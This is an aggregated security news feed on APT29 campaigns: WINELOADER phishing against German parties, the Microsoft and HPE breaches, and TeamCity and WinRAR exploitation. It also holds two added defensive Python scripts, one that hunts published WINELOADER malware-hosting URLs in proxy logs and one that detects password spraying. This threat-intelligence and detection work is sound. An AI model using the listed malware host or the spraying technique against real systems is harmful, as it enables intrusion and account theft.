www.secnews.physaphae.fr
This is the RSS 2.0 feed from www.secnews.physaphae.fr: a simple aggregated flow of articles from multiple sources. The list of sources can be found on www.secnews.physaphae.fr.
Feed generated: 2024-05-21T06:34:23+00:00

Mandiant (Mandiant security blog)
Poll Vaulting: Cyber Threats to Global Elections

Executive Summary
The election cybersecurity landscape globally is characterized by a diversity of targets, tactics, and threats. Elections attract threat activity from a variety of threat actors, including state-sponsored actors, cyber criminals, hacktivists, insiders, and information-operations-as-a-service entities. Mandiant assesses with high confidence that state-sponsored actors pose the most serious cybersecurity risk to elections. Operations targeting election-related infrastructure can combine cyber intrusion activity, disruptive and destructive capabilities, and information operations, which include elements of public-facing advertisement and amplification of threat activity claims. Successful targeting does not automatically translate to high impact. Many threat actors have struggled to influence or achieve significant effects, despite their best efforts.

When we look across the globe we find that the attack surface of an election involves a wide variety of entities beyond voting machines and voter registries. In fact, our observations of past cycles indicate that cyber operations target the major players involved in campaigning, political parties, news and social media more frequently than actual election infrastructure.

Securing elections requires a comprehensive understanding of many types of threats and tactics, from distributed denial of service (DDoS) to data theft to deepfakes, that are likely to impact elections in 2024. It is vital to understand the variety of relevant threat vectors and how they relate, and to ensure mitigation strategies are in place to address the full scope of potential activity. Election organizations should consider steps to harden infrastructure against common attacks, and utilize account security tools such as Google's Advanced Protection Program to protect high-risk accounts.

Introduction
The 2024 global election cybersecurity landscape is characterized by a diversity of targets, tactics, and threats. An expansive ecosystem of systems, administrators, campaign infrastructure, and public communications venues must be secured against a diverse array of operators and methods. Any election cybersecurity strategy should begin with a survey of the threat landscape to build a more proactive and tailored security posture.

The cybersecurity community must keep pace as more than two billion voters are expected to head to the polls in 2024. With elections in an estimated 50 or more countries, there is an opportunity to dynamically track how threats to democracy evolve. Understanding how threats are targeting one country will enable us to better anticipate and prepare for upcoming elections globally. At the same time, we must also appreciate the unique context of different countries. Election threats to South Africa, India, and the United States will inevitably differ in some regard. In either case, there is an opportunity for us to prepare with the advantage of intelligence.
Published: 2024-04-25T10:00:00+00:00
Source: https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-global-elections/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8500393
Tags: Ransomware, Malware, Hack, Tool, Vulnerability, Threat, Legislation, Cloud, Technical. Actors: APT 43, APT 29, APT 31, APT 42, APT 28, APT 40

ProofPoint (Cyber Firms)
Cybersecurity Stop of the Month: Defeating Malicious Application Creation Attacks
Published: 2024-04-12T06:00:03+00:00
Source: https://www.proofpoint.com/us/blog/email-and-cloud-threats/defeating-malicious-application-creation-attacks
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8480713
Tags: Spam, Malware, Tool, Threat, Cloud. Actors: APT 29

Bleeping Computer (US magazine)
CISA orders agencies impacted by Microsoft hack to mitigate risks
CISA has issued a new emergency directive ordering U.S. federal agencies to address risks resulting from the breach of multiple Microsoft corporate email accounts by the Russian APT29 hacking group. [...]
Published: 2024-04-11T13:47:19+00:00
Source: https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-impacted-by-microsoft-hack-to-mitigate-risks/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8480159
Tags: Hack. Actors: APT 29

ProofPoint (Cyber Firms)
Revisiting MACT: Malicious Applications in Credible Cloud Tenants
Published: 2024-04-11T13:27:54+00:00
Source: https://www.proofpoint.com/us/blog/cloud-security/revisiting-mact-malicious-applications-credible-cloud-tenants
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8480061
Tags: Malware, Threat, Prediction, Cloud. Actors: APT 29

InfoSecurity Mag (InfoSecurity Magazine)
Russian Cozy Bear Group Targets German Politicians
Mandiant observes what it claims is the first ever APT29 campaign aimed at political parties.
Published: 2024-03-25T09:30:00+00:00
Source: https://www.infosecurity-magazine.com/news/russian-cozy-bear-group-targets/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8470067
Actors: APT 29

The Hacker News (hacking news blog)
Russian Hackers Use 'WINELOADER' Malware to Target German Political Parties
The WINELOADER backdoor used in recent cyber attacks targeting diplomatic entities with wine-tasting phishing lures has been attributed as the handiwork of a hacking group with links to Russia's Foreign Intelligence Service (SVR), which was responsible for breaching SolarWinds and Microsoft. The findings come from Mandiant, which said Midnight Blizzard (aka APT29, BlueBravo, or [...]
Published: 2024-03-23T11:33:00+00:00
Source: https://thehackernews.com/2024/03/russian-hackers-use-wineloader-malware.html
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8468914
Tags: Malware. Actors: APT 29

Mandiant (Mandiant security blog)
APT29 Uses WINELOADER to Target German Political Parties
Same article as the next entry, which carries the full executive summary.
Published: 2024-03-22T11:00:00+00:00
Source: https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8469994
Tags: Threat. Actors: APT 29

Mandiant (Mandiant security blog)
APT29 Uses WINELOADER to Target German Political Parties

Executive Summary
In late February, APT29 used a new backdoor variant publicly tracked as WINELOADER to target German political parties with a CDU-themed lure. This is the first time we have seen this APT29 cluster target political parties, indicating a possible area of emerging operational focus beyond the typical targeting of diplomatic missions. Based on the SVR's responsibility to collect political intelligence and this APT29 cluster's historical targeting patterns, we judge this activity to present a broad threat to European and other Western political parties from across the political spectrum.

Please see the Technical Annex for technical details and MITRE ATT&CK techniques (T1543.003, T1012, T1082, T1134, T1057, T1007, T1027, T1070.004, T1055.003 and T1083).

Threat Detail
In late February 2024, Mandiant identified APT29, a Russian Federation backed threat group linked by multiple governments to Russia's Foreign Intelligence Service (SVR), conducting a phishing campaign targeting German political parties. Consistent with APT29 operations extending back to 2021, this operation leveraged APT29's mainstay first-stage payload ROOTSAW (aka EnvyScout) to deliver a new backdoor variant publicly tracked as WINELOADER.

Notably, this activity represents a departure from this APT29 initial access cluster's typical remit of targeting governments, foreign embassies, and other diplomatic missions, and is the first time Mandiant has seen an operational interest in political parties from this APT29 subcluster. Additionally, while APT29 has previously used lure documents bearing the logo of German government organizations, this is the first instance where we have seen the group use German-language lure content, a possible artifact of the targeting differences (i.e. domestic vs. foreign) between the two operations.

Phishing emails were sent to victims purporting to be an invite to a dinner reception on 01 March bearing a logo from the Christian Democratic Union (CDU), a major political party in Germany (see Figure 1). The German-language lure document contains a phishing link directing victims to a malicious ZIP file containing a ROOTSAW dropper hosted on an actor-controlled compromised website, "https://waterforvoiceless[.]org/invite.php". ROOTSAW delivered a second-stage CDU-themed lure document and a next-stage WINELOADER payload retrieved from "waterforvoiceless[.]org/util.php".

WINELOADER was first observed in operational use in late January 2024 in an operation targeting likely diplomatic entities in Czechia, Germany, India, Italy, Latvia, and Peru. The backdoor contains several features and functions that overlap with several known APT29 malware families including BURNTBATTER, MUSKYBEAT and BEATDROP, indicating they are likely created by a common developer (see Technical Annex for additional details).

Published: 2024-03-22T00:00:00+00:00
Source: https://cloud.google.com/blog/topics/threat-intelligence/apt29-wineloader-german-political-parties/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8500402
Tags: Malware, Threat, Cloud, Technical. Actors: APT 29

HackRead
Russian Midnight Blizzard Hackers Breached Microsoft Source Code
By Deeba Ahmed. Midnight Blizzard (aka Cozy Bear and APT29) originally breached Microsoft on January 12, 2024.
Published: 2024-03-11T12:19:02+00:00
Source: https://www.hackread.com/russia-midnight-blizzard-hackers-microsoft-source-code/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8462118
Actors: APT 29
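The Mandiant WINELOADER entry above describes a two-stage fetch from one compromised host: the lure link pulls a ZIP carrying the ROOTSAW dropper from invite.php, and ROOTSAW then retrieves WINELOADER from util.php. The report publishes both indicators defanged. The following is an added example, not code from Mandiant or from any article in this feed: it refangs the two published indicators and hunts for them in web-proxy logs, reporting separately the clients that completed both stages in order. The log lines are constructed for the example, and the field layout (epoch timestamp, client IP, status, method, URL) is an assumption rather than any real product's format.

```python
"""Added example: refang the WINELOADER indicators published in the Mandiant
entry and hunt for them in web-proxy logs.

The log lines below are constructed for this example; the field layout
(timestamp, client, status, method, URL) is an assumption, not a real
product's format."""
import re
from collections import defaultdict

# Indicators exactly as published (defanged with "[.]").
DEFANGED_IOCS = [
    "https://waterforvoiceless[.]org/invite.php",  # ZIP carrying the ROOTSAW dropper
    "waterforvoiceless[.]org/util.php",            # WINELOADER retrieved by ROOTSAW
]

ROOTSAW_STAGE = "/invite.php"
WINELOADER_STAGE = "/util.php"


def refang(ioc: str) -> str:
    """Undo report-style defanging so the indicator can be matched literally."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def host_and_path(url: str) -> tuple:
    """Normalise a URL (defanged or not) to (lowercase host, path without query)."""
    bare = re.sub(r"^https?://", "", refang(url.strip()))
    host, _, path = bare.partition("/")
    return host.lower(), "/" + path.split("?", 1)[0]


IOC_SET = {host_and_path(i) for i in DEFANGED_IOCS}

# Constructed proxy log: epoch seconds, client IP, cache/status, method, URL.
SAMPLE_PROXY_LOG = """\
1709200000.101 10.0.0.5 TCP_MISS/200 GET https://waterforvoiceless.org/invite.php
1709200004.210 10.0.0.5 TCP_MISS/200 GET https://waterforvoiceless.org/util.php
1709200010.000 10.0.0.9 TCP_MISS/200 GET https://example.org/index.html
1709200020.000 10.0.0.7 TCP_MISS/200 GET https://WaterForVoiceless.org/util.php?x=1
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<client>\S+)\s+\S+\s+(?P<method>\S+)\s+(?P<url>\S+)"
)


def scan_proxy_log(log_text: str) -> dict:
    """Return {client_ip: [matched IOC paths in log order]} for every hit."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        key = host_and_path(m["url"])
        if key in IOC_SET:
            hits[m["client"]].append(key[1])
    return dict(hits)


def completed_chain(hits: dict) -> list:
    """Clients that fetched the ROOTSAW stage and then the WINELOADER stage.

    A util.php fetch with no preceding invite.php fetch is still reported by
    scan_proxy_log, but it may be a scanner or a retry, so it is not counted
    as a completed chain here."""
    return sorted(
        client for client, paths in hits.items()
        if ROOTSAW_STAGE in paths and WINELOADER_STAGE in paths
        and paths.index(ROOTSAW_STAGE) < paths.index(WINELOADER_STAGE)
    )


if __name__ == "__main__":
    found = scan_proxy_log(SAMPLE_PROXY_LOG)
    for client, paths in found.items():
        print(client, "->", ", ".join(paths))
    print("full ROOTSAW -> WINELOADER chain:", completed_chain(found))
```

Matching is done on host and path after lower-casing the host and dropping the query string, so a mixed-case hostname or a cache-busting parameter does not hide a hit; the host alone is deliberately not used as the key, since the report names a compromised legitimate site rather than a domain the actor registered.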
InfoSecurity Mag (InfoSecurity Magazine)
Russia's Midnight Blizzard Accesses Microsoft Source Code
Threat group APT29 is using secrets stolen in an earlier attack to compromise Microsoft's internal systems.
Published: 2024-03-11T09:30:00+00:00
Source: https://www.infosecurity-magazine.com/news/russias-midnight-blizzard/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8462049
Tags: Threat. Actors: APT 29

The Hacker News (hacking news blog)
Microsoft Confirms Russian Hackers Stole Source Code, Some Customer Secrets
Microsoft on Friday revealed that the Kremlin-backed threat actor known as Midnight Blizzard (aka APT29 or Cozy Bear) managed to gain access to some of its source code repositories and internal systems following a hack that came to light in January 2024. "In recent weeks, we have seen evidence that Midnight Blizzard is using information initially exfiltrated from our [...]
Published: 2024-03-09T09:31:00+00:00
Source: https://thehackernews.com/2024/03/microsoft-confirms-russian-hackers.html
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8461117
Tags: Hack, Threat. Actors: APT 29

CyberScoop (scoopnewsgroup.com, Cyber section)
Russian hackers accessed Microsoft source code
An incident attributed to the Russian hacking crew Cozy Bear that was first disclosed in January continues to affect Microsoft systems.
Published: 2024-03-08T20:41:15+00:00
Source: https://cyberscoop.com/microsoft-cozy-bear-russia/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8460972
Actors: APT 29
TechRepublic (Security News US)
UK's NCSC Issues Warning as SVR Hackers Target Cloud Services
Cyber espionage group APT29 is adapting its tactics for cloud environments. Here's what you should know.
Published: 2024-03-01T20:15:10+00:00
Source: https://www.techrepublic.com/article/ncsc-uk-svr-cyber-threat-actors/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8457678
Tags: Cloud. Actors: APT 29

The Hacker News (hacking news blog)
Five Eyes Agencies Expose APT29's Evolving Cloud Attack Tactics
Cybersecurity and intelligence agencies from the Five Eyes nations have released a joint advisory detailing the evolving tactics of the Russian state-sponsored threat actor known as APT29. The hacking outfit, also known as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes, is assessed to be affiliated with the Foreign Intelligence Service (SVR) of the [...]
Published: 2024-02-27T16:04:00+00:00
Source: https://thehackernews.com/2024/02/five-eyes-agencies-expose-apt29s.html
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8455808
Tags: Threat, Cloud. Actors: APT 29

The Register (UK news site)
Russia's Cozy Bear dives into cloud environments with a new bag of tricks
Kremlin's spies tried out the TTPs on Microsoft, and now they're off to the races. Russia's notorious Cozy Bear, the crew behind the SolarWinds supply chain attack, has expanded its targets and evolved its techniques to break into organizations' cloud environments, according to the Five Eyes governments. [...]
Published: 2024-02-27T01:00:06+00:00
Source: https://go.theregister.com/feed/www.theregister.com/2024/02/27/russia_cozy_bear_new_ttps/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8455631
Tags: Cloud. Actors: APT 29

InfoSecurity Mag (InfoSecurity Magazine)
CISA Issues Alert on APT29's Cloud Infiltration Tactics
Known as Midnight Blizzard, the Dukes or Cozy Bear, the group has been identified as a Russian entity likely operating under the SVR.
Published: 2024-02-26T17:15:00+00:00
Source: https://www.infosecurity-magazine.com/news/cisa-alert-apt29s-cloud-tactics/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8455490
Tags: Cloud. Actors: APT 29

Global Security Mag (French news site)
APT29's attack on Microsoft: following Cozy Bear's tracks, a CyberArk analysis
Category: Malwares
Published: 2024-02-09T09:20:11+00:00
Source: https://www.globalsecuritymag.fr/l-attaque-d-apt29-contre-microsoft-suivre-les-traces-de-cozy-bear-analyse-de.html
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8448321
Actors: APT 29

CyberArk (software vendor)
APT29's Attack on Microsoft: Tracking Cozy Bear's Footprints
A new and concerning chapter has unfolded in these troubled times of geopolitical chaos. The Cozy Bear threat actor has caused significant breaches targeting Microsoft and HPE, and more are likely to come. These recent [...]
Published: 2024-02-08T14:51:00+00:00
Source: https://www.cyberark.com/blog/apt29s-attack-on-microsoft-tracking-cozy-bears-footprints/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8448041
Tags: Threat. Actors: APT 29

Checkpoint Research (security hardware vendor)
29th January – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 29th January, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES: Following the reports on the Russia-affiliated APT29 (aka Cozy Bear, Midnight Blizzard) attack against Microsoft, Hewlett Packard Enterprise also acknowledged it was attacked by the same threat actor. While Microsoft detected the breach on January [...]
Published: 2024-01-29T13:51:49+00:00
Source: https://research.checkpoint.com/2024/29th-january-threat-intelligence-report/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8444429
Tags: Threat. Actors: APT 29
The Hacker News (hacking news blog)
Microsoft Warns of Widening APT29 Espionage Attacks Targeting Global Orgs
Microsoft on Thursday said the Russian state-sponsored threat actors responsible for a cyber attack on its systems in late November 2023 have been targeting other organizations and that it's currently beginning to notify them. The development comes a day after Hewlett Packard Enterprise (HPE) revealed that it had been the victim of an attack perpetrated by a hacking crew [...]
Published: 2024-01-26T11:33:00+00:00
Source: https://thehackernews.com/2024/01/microsoft-warns-of-widening-apt29.html
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8443285
Tags: Threat. Actors: APT 29

InfoSecurity Mag (InfoSecurity Magazine)
HPE Says SolarWinds Hackers Accessed its Emails
Hewlett Packard Enterprise reveals that Russian state APT29 hackers stole data from corporate mailboxes.
Published: 2024-01-25T09:30:00+00:00
Source: https://www.infosecurity-magazine.com/news/hpe-solarwinds-hackers-accessed/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8442894
Actors: APT 29

Recorded Future (Recorded Future feed)
Hewlett Packard Enterprise tells SEC it was breached by Russia's 'Cozy Bear' hackers
Hackers with suspected ties to the Russian government gained access to the technology manufacturer Hewlett Packard Enterprise Co.'s (HPE) cloud-based email environment, the company said Wednesday. In a filing with SEC regulators on Wednesday afternoon, HPE said it was notified on December 12 that hackers connected to Cozy Bear, also known as Midnight Blizzard, had [...]
Published: 2024-01-24T22:15:00+00:00
Source: https://therecord.media/hpe-tells-sec-breached-by-cozy-bear
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8442718
Actors: APT 29
knowbe4 (cybersecurity services)
Russian Hackers Win Big: Microsoft's Senior Exec Team Emails Breached
In a Friday regulatory filing, Microsoft reported that its corporate email accounts were compromised by a Russian state-sponsored hacking group known as Midnight Blizzard, also identified as Nobelium or APT29. Microsoft's disclosure aligns with new U.S. requirements for reporting cybersecurity incidents. The attack was detected on January 12th, 2024, but it appears to have started in November 2023.

The Breach and Attack
The attack involved Russian hackers using a password spray attack to access a legacy non-production test tenant account at Microsoft. Password spraying is a brute force technique where attackers attempt to log in using a list of potential usernames and passwords.
Published: 2024-01-20T14:45:06+00:00
Source: https://blog.knowbe4.com/russian-hackers-win-big-microsofts-senior-exec-team-emails-breached
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8441002
Actors: APT 29
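The entry above describes password spraying as a brute-force technique over a list of usernames and passwords. What distinguishes a spray from an ordinary brute-force run, and what a detection has to key on, is the shape of the failures: one source tries a small number of passwords against many different accounts, so each account sees only one or two failed logins and never trips a per-account lockout. The following is an added example, not KnowBe4's code or Microsoft's telemetry: it runs that detection over constructed sign-in records, separates a spray from a single-account brute force and from a user mistyping a password, and then reports which account the spraying source eventually authenticated to. The window and thresholds are assumed tuning values.

```python
"""Added example: flag password spraying in authentication logs.

A spray tries a few passwords across many accounts, so the signal is one
source failing against many distinct usernames with few attempts each,
unlike a brute-force run that hammers a single account. The sign-in records
and thresholds below are constructed/assumed for this example; they are not
Microsoft's telemetry or KnowBe4's code."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records: (ISO timestamp, source IP, username, result)
SAMPLE_EVENTS = [
    # one source walks through many accounts, one guess each: a spray
    ("2023-11-20T02:00:00", "203.0.113.10", "alice", "fail"),
    ("2023-11-20T02:00:05", "203.0.113.10", "bob", "fail"),
    ("2023-11-20T02:00:11", "203.0.113.10", "carol", "fail"),
    ("2023-11-20T02:00:16", "203.0.113.10", "dave", "fail"),
    ("2023-11-20T02:00:22", "203.0.113.10", "erin", "fail"),
    ("2023-11-20T02:00:27", "203.0.113.10", "svc-legacy-test", "fail"),
    # ...and lands on a legacy test account
    ("2023-11-20T02:00:33", "203.0.113.10", "svc-legacy-test", "success"),
    # a different source hammers one account: brute force, not a spray
    ("2023-11-20T02:05:00", "198.51.100.7", "frank", "fail"),
    ("2023-11-20T02:05:02", "198.51.100.7", "frank", "fail"),
    ("2023-11-20T02:05:04", "198.51.100.7", "frank", "fail"),
    ("2023-11-20T02:05:06", "198.51.100.7", "frank", "fail"),
    ("2023-11-20T02:05:08", "198.51.100.7", "frank", "fail"),
    ("2023-11-20T02:05:10", "198.51.100.7", "frank", "fail"),
    # a user mistyping once, then succeeding: benign
    ("2023-11-20T03:00:00", "10.0.0.3", "grace", "fail"),
    ("2023-11-20T03:00:09", "10.0.0.3", "grace", "success"),
]

WINDOW = timedelta(minutes=10)   # assumed tuning values
MIN_DISTINCT_USERS = 5
MAX_FAILS_PER_USER = 2


def detect_spray(events, window=WINDOW, min_users=MIN_DISTINCT_USERS,
                 max_per_user=MAX_FAILS_PER_USER):
    """Return {source_ip: sorted usernames} for sources whose failed logins
    within any `window` cover >= min_users distinct accounts while no single
    account is tried more than max_per_user times."""
    fails_by_src = defaultdict(list)
    for ts, src, user, result in events:
        if result == "fail":
            fails_by_src[src].append((datetime.fromisoformat(ts), user))

    alerts = {}
    for src, fails in fails_by_src.items():
        fails.sort()
        best = None
        start = 0
        for end in range(len(fails)):
            # slide the window so fails[start:end+1] spans at most `window`
            while fails[end][0] - fails[start][0] > window:
                start += 1
            per_user = defaultdict(int)
            for _, user in fails[start:end + 1]:
                per_user[user] += 1
            if (len(per_user) >= min_users
                    and max(per_user.values()) <= max_per_user
                    and (best is None or len(per_user) > len(best))):
                best = sorted(per_user)
        if best:
            alerts[src] = best
    return alerts


def successes_from_sprayers(events, alerts):
    """Accounts that authenticated successfully from a source already flagged
    as spraying: the account the attacker actually got into."""
    got_in = defaultdict(set)
    for _, src, user, result in events:
        if result == "success" and src in alerts:
            got_in[src].add(user)
    return {src: sorted(users) for src, users in got_in.items()}


if __name__ == "__main__":
    sprayers = detect_spray(SAMPLE_EVENTS)
    print("spraying sources:", sprayers)
    print("compromised accounts:", successes_from_sprayers(SAMPLE_EVENTS, sprayers))
```

The per-source key is the simplest choice and is what makes a single noisy source stand out; a sprayer rotating through many source addresses would need the same logic keyed on something else (tenant, user agent, or time bucket), which is why the success-after-spray check matters: it catches the outcome even when the failures were spread thin enough to stay under the threshold.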
RiskIQ (cyber risk firm, now part of Microsoft)
Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally
Description: Russian Foreign Intelligence Service (SVR) cyber actors, also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard, are exploiting CVE-2023-42793 at a large scale, targeting servers hosting JetBrains TeamCity software since September 2023. Software developers use TeamCity software to manage and automate software compilation, building, testing, and releasing. If compromised, access to a TeamCity server would provide malicious actors with access to that software developer's source code, signing certificates, and the ability to subvert software compilation and deployment processes, access a malicious actor could further use to conduct supply chain operations. Although the SVR used such access to compromise SolarWinds and its customers in 2020, the limited number and seemingly opportunistic types of victims currently identified indicate that the SVR has not used the access afforded by the TeamCity CVE in a similar manner. The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments.
Reference URL(s): https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
Publication Date: December 12, 2023
Author(s): CISA
Published: 2023-12-20T21:21:37+00:00
Source: https://community.riskiq.com/article/4dba0576
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8426379
Tags: Threat. Actors: APT 29

HackRead
Russian APT29 Hacked US Biomedical Giant in TeamCity-Linked Breach
By Waqas. Polish authorities and FortiGuard Labs have issued a warning to customers about a new wave of cyberattacks associated with TeamCity.
Published: 2023-12-15T00:15:19+00:00
Source: https://www.hackread.com/russian-apt29-hacked-us-biomedical-teamcity/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8422928
Actors: APT 29
The Hacker News (hacking news blog)
Russian SVR-Linked APT29 Targets JetBrains TeamCity Servers in Ongoing Attacks
Threat actors affiliated with the Russian Foreign Intelligence Service (SVR) have targeted unpatched JetBrains TeamCity servers in widespread attacks since September 2023. The activity has been tied to a nation-state group known as APT29, which is also tracked as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. It's notable for the supply chain [...]
Published: 2023-12-14T16:02:00+00:00
Source: https://thehackernews.com/2023/12/russian-svr-linked-apt29-targets.html
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8422584
Tags: Threat. Actors: APT 29

InfoSecurity Mag (InfoSecurity Magazine)
Cozy Bear Hackers Target JetBrains TeamCity Servers in Global Campaign
The FBI and CISA detected that hackers linked to the Russian foreign intelligence service (SVR) have been targeting a JetBrains TeamCity vulnerability since September 2023.
Published: 2023-12-14T15:30:00+00:00
Source: https://www.infosecurity-magazine.com/news/cozy-bear-russia-jetbrains-teamcity/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8422706
Tags: Vulnerability. Actors: APT 29

Dark Reading (InformationWeek branch)
Global TeamCity Exploitation Opens Door to SolarWinds-Style Nightmare
Russia's APT29 is going after a critical RCE flaw in the JetBrains TeamCity software developer platform, prompting governments worldwide to issue an urgent warning to patch.
Published: 2023-12-13T23:26:00+00:00
Source: https://www.darkreading.com/vulnerabilities-threats/global-teamcity-exploitation-opens-door-to-solarwinds-style-nightmare
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8422329
Tags: Threat. Actors: APT 29

Fortinet (security hardware vendor)
TeamCity Intrusion Saga: APT29 Suspected Among the Attackers Exploiting CVE-2023-42793
FortiGuard Labs discovered a new APT29 campaign which includes TeamCity exploitation and GraphicalProton malware. Learn more.
Published: 2023-12-13T15:00:00+00:00
Source: https://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8422188
Tags: Malware. Actors: APT 29

Global Security Mag (French news site)
APT 29 exploits WinRAR to attack embassies in Europe
Category: Malwares
Published: 2023-11-24T09:30:46+00:00
Source: https://www.globalsecuritymag.fr/APT-29-exploite-WinRAR-pour-attaquer-des-ambassades-en-Europe.html
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8416529
Actors: APT 29

InfoSecurity Mag (InfoSecurity Magazine)
Russia's APT29 Targets Embassies With Ngrok and WinRAR Exploit
Threat group may be looking for intel on Azerbaijan.
Published: 2023-11-20T10:00:00+00:00
Source: https://www.infosecurity-magazine.com/news/russias-apt29-embassies-ngrok/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8414772
Tags: Threat. Actors: APT 29

Bleeping Computer (US magazine)
Russian hackers use Ngrok feature and WinRAR exploit to attack embassies
After Sandworm and APT28 (known as Fancy Bear), another state-sponsored Russian hacker group, APT29, is leveraging the CVE-2023-38831 vulnerability in WinRAR for cyberattacks. [...]
Published: 2023-11-19T11:14:25+00:00
Source: https://www.bleepingcomputer.com/news/security/russian-hackers-use-ngrok-feature-and-winrar-exploit-to-attack-embassies/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8414888
Tags: Vulnerability, Threat. Actors: APT 29, APT 28

Recorded Future (Recorded Future feed)
Cyber-espionage operation on embassies linked to Russia's Cozy Bear hackers
Russian state-sponsored hackers have targeted embassies and international organizations in a recent cyber-espionage campaign, Ukrainian government cybersecurity researchers have found. The attacks were attributed to the infamous hacker group labeled APT29, also known as Cozy Bear or Blue Bravo. Analysts previously have linked it to Russia's Foreign Intelligence Service (SVR), which gathers political and economic [...]
Published: 2023-11-14T16:34:00+00:00
Source: https://therecord.media/cyber-espionage-campaign-embassies-apt29-cozy-bear
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8411945
Actors: APT 29
Bleeping Computer (US magazine)
SEC sues SolarWinds for misleading investors before 2020 hack
The U.S. Securities and Exchange Commission (SEC) today charged SolarWinds with defrauding investors by allegedly concealing cybersecurity defense issues before a December 2020 breach linked to APT29, the Russian Foreign Intelligence Service (SVR) hacking division. [...]
Published: 2023-10-30T17:54:13+00:00
Source: https://www.bleepingcomputer.com/news/security/sec-sues-solarwinds-for-misleading-investors-before-2020-hack/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8403150
Tags: Hack. Actors: APT 29, SolarWinds

AhnLab (Korean security firm)
2023 Aug – Threat Trend Report on APT Groups
August 2023 Major Issues on APT Groups: 1) Andariel 2) APT29 3) APT31 4) Bitter 5) Bronze Starlight 6) Callisto 7) Carderbee 8) Charcoal Typhoon (RedHotel) 9) Earth Estries 10) Flax Typhoon 11) GroundPeony 12) Infamous Chisel 13) Kimsuky 14) Lazarus 15) MoustachedBouncher 16) Mysterious Elephant (APT-K-47) 17) Nobelium (Midnight Blizzard) 18) Red Eyes (APT37). Aug_Threat Trend Report on APT Groups
Published: 2023-10-23T02:22:16+00:00
Source: https://asec.ahnlab.com/en/57930/
Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8399124
Tags: Threat, Prediction. Actors: APT 38, APT 29, APT 37, APT 31
Mandiant - Mandiant security blog Backchannel Diplomacy: APT29's Rapidly Evolving Diplomatic Phishing Operations
Key Insights: APT29's pace of operations and emphasis on Ukraine increased in the first half of 2023 as Kyiv launched its counteroffensive, pointing to the SVR's central role in collecting intelligence concerning the current pivotal phase of the war. During this period, Mandiant has tracked substantial changes in APT29's tooling and tradecraft, likely designed to support the increased frequency and scope of operations and hinder forensic analysis. APT29 has used various infection chains simultaneously across different operations, indicating that distinct initial access operators or
2023-09-21T09:00:00+00:00 https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing www.secnews.physaphae.fr/article.php?IdArticle=8386704 False None APT 29 3.0000000000000000
AhnLab - Korean Security Firm Threat Trend Report on APT Groups – July 2023
July 2023 Major Issues on APT Groups 1) APT28 2) APT29 3) APT31 4) Camouflaged Hunter 5) Charming Kitten 6) Gamaredon 7) Kimsuky 8) Konni 9) Lazarus 10) Mustang Panda 11) Patchwork 12) Red Eyes 13) Space Pirates 14) Turla 15) Unclassified ATIP_2023_Jul_Threat Trend Report on APT Groups
2023-09-11T05:02:48+00:00 https://asec.ahnlab.com/en/56971/ www.secnews.physaphae.fr/article.php?IdArticle=8381128 False Threat,Prediction APT 38,APT 35,APT 35,APT 29,APT 29,APT 37,APT 37,APT 31,APT 28,APT 28 2.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, no?) Russian Hackers Use Zulip Chat App for Covert C&C in Diplomatic Phishing Attacks
